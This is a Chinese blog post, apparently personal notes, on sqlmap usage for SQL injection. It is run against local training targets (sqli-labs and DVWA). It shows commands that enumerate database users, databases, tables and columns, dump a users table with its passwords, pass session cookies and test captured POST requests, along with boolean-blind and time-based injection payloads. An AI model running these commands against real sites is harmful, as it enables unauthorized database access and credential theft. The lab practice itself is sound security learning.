sqlmap sql注入常用使用

作者: _Irving | 来源:发表于2024-03-26 16:39 被阅读0次

BurpSuite搭配Sqlmap进行自动化SQL注入测试
sql map 总结
Sqlmap使用教程【个人笔记精华整理】(转载）
web训练sql注入中级练习-墨者学堂
墨者学院-SQL注入漏洞测试(布尔盲注)
sqlmapapi使用中遇到的问题
Sql注入之sqlmapapi介绍
小迪16期-20170408
sqlmap使用，靶场测试
SQLmap工具常用命令

--users:列出数据库管理系统用户

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --users -v 0
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
database management system users [4]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'c3acec58476d'
[*] 'root'@'localhost'

--dbs可以利用的数据库

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --dbs -v 0
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
available databases [5]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security

--tables列数据库表

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --tables -D "security"

---
[16:30:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[16:30:36] [INFO] fetching tables for database: 'security'
[16:30:36] [INFO] resumed: 'emails'
[16:30:36] [INFO] resumed: 'referers'
[16:30:36] [INFO] resumed: 'uagents'
[16:30:36] [INFO] resumed: 'users'
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

--columns 列出表中的列名

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --columns -D "security" -T "users"
---
[16:31:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[16:31:38] [INFO] fetching columns for table 'users' in database 'security'
[16:31:38] [INFO] resumed: 'id','int(3)'
[16:31:38] [INFO] resumed: 'username','varchar(20)'
[16:31:38] [INFO] resumed: 'password','varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

--dump列表中指定列的内容

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --dump -D "security" -T "users"
---
[16:32:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[16:32:50] [INFO] fetching columns for table 'users' in database 'security'
[16:32:50] [INFO] resumed: 'id','int(3)'
[16:32:50] [INFO] resumed: 'username','varchar(20)'
[16:32:50] [INFO] resumed: 'password','varchar(20)'
[16:32:50] [INFO] fetching entries for table 'users' in database 'security'
[16:32:50] [INFO] resumed: '1','Dumb','Dumb'
[16:32:50] [INFO] resumed: '2','I-kill-you','Angelina'
[16:32:50] [INFO] resumed: '3','p@ssword','Dummy'
[16:32:50] [INFO] resumed: '4','crappy','secure'
[16:32:50] [INFO] resumed: '5','stupidity','stupid'
[16:32:50] [INFO] resumed: '6','genious','superman'
[16:32:50] [INFO] resumed: '7','mob!le','batman'
[16:32:50] [INFO] resumed: '8','admin','admin'
[16:32:50] [INFO] resumed: '9','admin1','admin1'
[16:32:50] [INFO] resumed: '10','admin2','admin2'
[16:32:50] [INFO] resumed: '11','admin3','admin3'
[16:32:50] [INFO] resumed: '12','dumbo','dhakkan'
[16:32:50] [INFO] resumed: '14','admin4','admin4'
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

-C:可以指定字段

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" -C username,password -D "security" -T "users" --dump

--dumap-all列出所有数据库，所有表内容

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --dump-all -D "security" -T "users"

--cookie 指定cookie的值，单/双引号包裹

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:8888/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=22791odtgjm7i2kadj6i5oqum3; security=low" --dbs -v 0

---
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
available databases [2]:
[*] dvwa
[*] information_schema

检测「post请求」的注入点，使用BP等工具「抓包」，将http请求内容保存到txt文件中(burp右键copy to file,保存为.txt文件)。-r 指定需要检测的文件，SQLmap会通过post请求方式检测目标。

F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -r "F:\测试\安全测试\burp安全测试工具\sqlmap-master\post2.txt" --dbs -v 0

---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 2314=2314&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2 AND (SELECT 7364 FROM (SELECT(SLEEP(5)))TtCl)&Submit=Submit
---
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [2]:
[*] dvwa
[*] information_schema